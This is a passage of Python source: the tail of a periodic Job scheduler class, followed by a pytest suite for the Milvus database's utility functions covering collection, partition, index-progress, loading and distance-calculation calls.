before they are simply thrown out to avoid calling the same function too
many times at once.
"""
def __init__(self, interval, func):
"""Initialize Job.
Args:
interval: number of seconds between calls to func
func: function to be called
"""
self.next_time = time.time() + interval
self.interval = interval
self.func = func
def is_ready_to_run(self, at_time):
"""Check if this job is (or will be) ready to run at the given time.
:param int at_time: Timestamp to check, in seconds
:return: ``True`` if the job is (or will be) ready to run, ``False``
otherwise
:rtype: boolean
"""
return (self.next_time - at_time) <= 0
def next(self):
"""Update self.next_time with the assumption func was just called.
Returns: A modified job object.
"""
last_time = self.next_time
current_time = time.time()
delta = last_time + self.interval - current_time
if last_time > current_time + self.interval:
# Clock appears to have moved backwards. Reset
# the timer to avoid waiting for the clock to
# catch up to whatever time it was previously.
self.next_time = current_time + self.interval
elif delta < 0 and abs(delta) > self.interval * self.max_catchup:
# Execution of jobs is too far behind. Give up on
# trying to catch up and reset the time, so that
# will only be repeated a maximum of
# self.max_catchup times.
self.next_time = current_time - \
self.interval * self.max_catchup
else:
self.next_time = last_time + self.interval
return self
def __str__(self):
"""Return a string representation of the Job object.
Example result::
<Job(2013-06-14 11:01:36.884000, 20s, <function upper at 0x02386BF0>)>
"""
iso_time = str(datetime.datetime.fromtimestamp(self.next_time))
return "<Job(%s, %ss, %s)>" % (iso_time, self.interval, self.func)
|
test_utility.py
|
import threading
import pytest
from base.client_base import TestcaseBase
from base.utility_wrapper import ApiUtilityWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.milvus_sys import MilvusSys
prefix = "utility"
default_schema = cf.gen_default_collection_schema()
default_int64_field_name = ct.default_int64_field_name
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_dim = ct.default_dim
default_nb = ct.default_nb
num_loaded_entities = "num_loaded_entities"
num_total_entities = "num_total_entities"
class TestUtilityParams(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if isinstance(request.param, str):
pytest.skip("string is valid type for metric")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_value(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if not isinstance(request.param, str):
pytest.skip("Skip invalid type for metric")
yield request.param
@pytest.fixture(scope="function", params=["JACCARD", "Superstructure", "Substructure"])
def get_not_support_metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def get_support_metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition_names(self, request):
if isinstance(request.param, list):
if len(request.param) == 0:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_collection with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_collection(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# elif not isinstance(c_name, str):
# self.utility_wrap.has_collection(c_name, check_task=CheckTasks.err_res, check_items={ct.err_code: 1, ct.err_msg: "illegal"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_partition with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
p_name = cf.gen_unique_str(prefix)
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_name_invalid(self, get_invalid_partition_name):
"""
target: test has_partition with error partition name
method: input invalid name
expected: raise exception
"""
self._connect()
ut = ApiUtilityWrapper()
c_name = cf.gen_unique_str(prefix)
p_name = get_invalid_partition_name
if isinstance(p_name, str) and p_name:
ex, _ = ut.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_name_invalid(self, get_invalid_collection_name):
self._connect()
error = f'`collection_name` value {get_invalid_collection_name} is illegal'
self.utility_wrap.drop_collection(get_invalid_collection_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: error})
# TODO: enable
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections_using_invalid(self):
"""
target: test list_collections with invalid using
method: input invalid name
expected: raise exception
"""
self._connect()
using = "empty"
ut = ApiUtilityWrapper()
ex, _ = ut.list_collections(using=using, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_invalid_name(self, get_invalid_collection_name):
"""
target: test building_process
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.index_building_progress(c_name, check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# TODO: not support index name
@pytest.mark.tags(CaseLabel.L1)
def _test_index_process_invalid_index_name(self, get_invalid_index_name):
"""
target: test building_process
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.index_building_progress(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_invalid_name(self, get_invalid_collection_name):
"""
target: test wait_index
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.wait_for_index_building_complete(c_name,
# check_items={ct.err_code: 1,
# ct.err_msg: "Invalid collection name"})
@pytest.mark.tags(CaseLabel.L1)
def _test_wait_index_invalid_index_name(self, get_invalid_index_name):
"""
target: test wait_index
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.wait_for_index_building_complete(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("invalid_c_name", ["12-s", "12 s", "(mn)", "中文", "%$#"])
def test_loading_progress_invalid_collection_name(self, invalid_c_name):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(invalid_c_name)}
self.utility_wrap.loading_progress(invalid_c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_not_existed_collection_name(self):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "describe collection failed: can't find collection"}
self.utility_wrap.loading_progress("not_existed_name", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #677")
def test_loading_progress_invalid_partition_names(self, get_invalid_partition_names):
"""
target: test loading progress with invalid partition names
method: input invalid partition names
expected: raise an exception
"""
collection_w = self.init_collection_general(prefix)[0]
partition_names = get_invalid_partition_names
err_msg = {ct.err_code: 0, ct.err_msg: "`partition_name_array` value {} is illegal".format(partition_names)}
collection_w.load()
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.parametrize("partition_names", [[ct.default_tag], [ct.default_partition_name, ct.default_tag]])
def test_loading_progress_not_existed_partitions(self, partition_names):
"""
target: test loading progress with not existed partitions
method: input all or part not existed partition names
expected: raise exception
"""
collection_w = self.init_collection_general(prefix)[0]
log.debug(collection_w.num_entities)
collection_w.load()
err_msg = {ct.err_code: 1, ct.err_msg: f"partitionID of partitionName:{ct.default_tag} can not be found"}
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_collection_not_existed(self):
"""
target: test wait for loading
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_loading_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_partition_not_existed(self):
"""
target: test wait for loading
method: input partition not created before
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
self.utility_wrap.wait_for_loading_complete(
collection_w.name, partition_names=[ct.default_tag],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: f'partitionID of partitionName:{ct.default_tag} can not be find'})
def test_drop_collection_not_existed(self):
"""
target: test drop an not existed collection
method: drop a not created collection
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "describe collection failed: can't find collection:"}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_type(self, get_support_metric_field, get_invalid_metric_type):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_type
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "params value {{'metric': {}}} "
"is illegal".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_value(self, get_support_metric_field, get_invalid_metric_value):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_value
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_not_support_metric(self, get_support_metric_field, get_not_support_metric):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_not_support_metric
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_using(self, get_support_metric_field):
"""
target: test calculated distance with invalid using
method: input invalid using
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
using = "empty"
self.utility_wrap.calc_distance(op_l, op_r, params, using=using,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_not_match_dim(self):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type and value
expected: raise exception
"""
self._connect()
dim = 129
vector_l = cf.gen_vectors(default_nb, default_dim)
vector_r = cf.gen_vectors(default_nb, dim)
op_l = {"float_vectors": vector_l}
op_r = {"float_vectors": vector_r}
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Cannot calculate distance between "
"vectors with different dimension"})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_collection_before_load(self, get_support_metric_field):
"""
target: test calculated distance when entities is not ready
method: calculate distance before load
expected: raise exception
"""
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb,
is_index=True)
middle = len(insert_ids) // 2
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection {} was not "
"loaded into memory)".format(collection_w.name)})
class TestUtilityBase(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=[True, False])
def sqrt(self, request):
yield request.param
@pytest.fixture(scope="function", params=["L2", "IP"])
def metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["HAMMING", "TANIMOTO"])
def metric_binary(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
cw = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(cw.name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_created(self):
"""
target: test has_collection with collection name which is not created
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
_ = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_after_drop(self):
"""
target: test has_collection with collection name droped before
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_collection(c_name)
assert res is True
cw.drop()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition(self):
"""
target: test has_partition with partition name
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_not_created(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name not created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_after_drop(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name dropped
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
cw = self.init_collection_wrap(name=c_name)
pw = self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
pw.drop()
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_default_partition(self):
"""
target: test has_partition with '_default' partition
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, ct.default_partition_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.list_collections()
assert c_name in res
# TODO: make sure all collections deleted
@pytest.mark.tags(CaseLabel.L1)
def _test_list_collections_no_collection(self):
"""
target: test list_collections
method: no collection created, list_collections
expected: length of the result equals to 0
"""
self._connect()
res, _ = self.utility_wrap.list_collections()
assert len(res) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_not_existed(self):
"""
target: test building_process
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.index_building_progress(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_empty(self):
"""
target: test building_process
method: input empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_insert_no_index(self):
"""
target: test building_process
method: insert 1 entity, no index created
expected: no exception raised
"""
nb = 1
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
error = {ct.err_code: 1, ct.err_msg: "no index is created"}
self.utility_wrap.index_building_progress(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_index(self):
"""
target: test building_process
method: 1.insert 1024 (because minSegmentSizeToEnableIndex=1024)
2.build(server does create index) and call building_process
expected: indexed_rows=0
"""
nb = 1024
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res['indexed_rows'] == 0
assert res['total_rows'] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_indexing(self):
"""
target: test building_process
method: 1.insert 2048 entities to ensure that server will build
2.call building_process during building
expected: 2048 or less entities indexed
"""
nb = 2048
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert (0 < res['indexed_rows'] <= nb)
assert res['total_rows'] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_not_existed(self):
"""
target: test wait_index
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_index_building_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_empty(self):
"""
target: test wait_index
method: input empty collection
expected: no exception raised
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw.create_index(default_field_name, default_index_params)
assert self.utility_wrap.wait_for_index_building_complete(c_name)[0]
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_index(self):
"""
target: test wait_index
method: insert 5000 entities, build and call wait_index
expected: 5000 entity indexed
"""
nb = 5000
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.wait_for_index_building_complete(c_name)
assert res is True
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res["indexed_rows"] == nb
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_without_loading(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.parametrize("nb", [ct.default_nb, 5000])
def test_loading_progress_collection(self, nb):
"""
target: test loading progress
method: 1.insert flush and load 2.call loading_progress
expected: all entities is loafed, because load is synchronous
"""
# create, insert default_nb, flush and load
collection_w = self.init_collection_general(prefix, insert_data=True, nb=nb)[0]
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_total_entities] == nb
assert res[num_loaded_entities] == nb
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #702")
def test_loading_progress_with_async_load(self):
"""
target: test loading progress with async collection load
method: 1.load collection with async=True 2.loading_progress
expected: loading part entities
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load(_async=True)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert (0 < res[num_loaded_entities] <= ct.default_nb)
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_empty_collection(self):
"""
target: test loading_progress on a empty collection
method: 1.create collection and no insert 2.loading_progress
expected: 0 entities is loaded
"""
collection_w = self.init_collection_wrap()
collection_w.load()
res, _ = self.utility_wrap.loading_progress(collection_w.name)
exp_res = {num_loaded_entities: 0, num_total_entities: 0}
assert exp_res == res
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_after_release(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_general(prefix, insert_data=True)[0]
collection_w.release()
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
@pytest.mark.tag(CaseLabel.L2)
def test_loading_progress_with_release_partition(self):
"""
target: test loading progress after release part partitions
method: 1.insert data into two partitions and flush
2.load collection and release onr partition
expected: loaded one partition entities
"""
half = ct.default_nb
# insert entities into two partitions, collection flush and load
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
partition_w.release()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
@pytest.mark.tag(CaseLabel.L2)
def test_loading_progress_with_load_partition(self):
"""
target: test loading progress after load partition
method: 1.insert data into two partitions and flush
2.load one partition and loading progress
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
collection_w.release()
partition_w.load()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_with_partition(self):
"""
target: test loading progress with partition
method: 1.insert data into two partitions and flush, and load
2.loading progress with one partition
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
res = self.utility_wrap.loading_progress(collection_w.name, partition_names=[partition_w.name])[0]
assert res[num_total_entities] == half
assert res[num_loaded_entities] == half
@pytest.mark.tags(CaseLabel.L1)
def test_wait_loading_collection_empty(self):
"""
target: test wait_for_loading
method: input empty collection
expected: no exception raised
"""
self._connect()
cw = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
cw.load()
self.utility_wrap.wait_for_loading_complete(cw.name)
res, _ = self.utility_wrap.loading_progress(cw.name)
exp_res = {num_total_entities: 0, num_loaded_entities: 0}
assert res == exp_res
@pytest.mark.xfail(reason="pymilvus issue #702")
@pytest.mark.tag(CaseLabel.L1)
def test_wait_for_loading_complete(self):
"""
target: test wait for loading collection
method: insert 10000 entities and wait for loading complete
expected: after loading complete, loaded entities is 10000
"""
nb = 6000
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
assert collection_w.num_entities == nb
collection_w.load(_async=True)
self.utility_wrap.wait_for_loading_complete(collection_w.name)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_loaded_entities] == nb
@pytest.mark.tag(CaseLabel.L0)
def test_drop_collection(self):
"""
target: test utility drop collection by name
method: input collection name and drop collection
expected: collection is dropped
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
def test_drop_collection_repeatedly(self):
"""
target: test drop collection repeatedly
method: 1.collection.drop 2.utility.drop_collection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
collection_w.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: {"describe collection failed: can't find collection:"}}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
def test_drop_collection_create_repeatedly(self):
"""
target: test repeatedly create and drop same name collection
method: repeatedly create and drop collection
expected: no exception
"""
from time import sleep
loops = 3
c_name = cf.gen_unique_str(prefix)
for _ in range(loops):
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
sleep(1)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_default(self):
"""
target: test calculated distance with default params
method: calculated distance between two random vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors")
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_sqrt(self, metric_field, metric):
"""
target: test calculated distance with default param
method: calculated distance with default sqrt
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default sqrt")
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_metric(self, sqrt):
"""
target: test calculated distance with default param
method: calculated distance with default metric
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
